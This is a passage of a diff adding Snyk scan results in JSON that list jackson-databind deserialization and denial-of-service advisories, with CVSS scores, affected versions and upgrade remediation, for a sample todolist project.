"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:23:45.326350Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:22:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:22:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.823657Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "cvssV3BaseScore": 6.8, + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.565013Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.85710", + "probability": "0.01257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14721" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9mxf-g3x6-wv74" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:25:40.161831Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:24:46Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:24:39Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.774444Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.690019Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19362" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c8hm-7hpq-7jhg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:19.256477Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.043196Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.593938Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19360" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f9hv-mg5h-xcw9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:23.673097Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:34.457712Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.548577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19361" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx9v-gmh4-mgqw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:31.715185Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:43Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.091904Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + 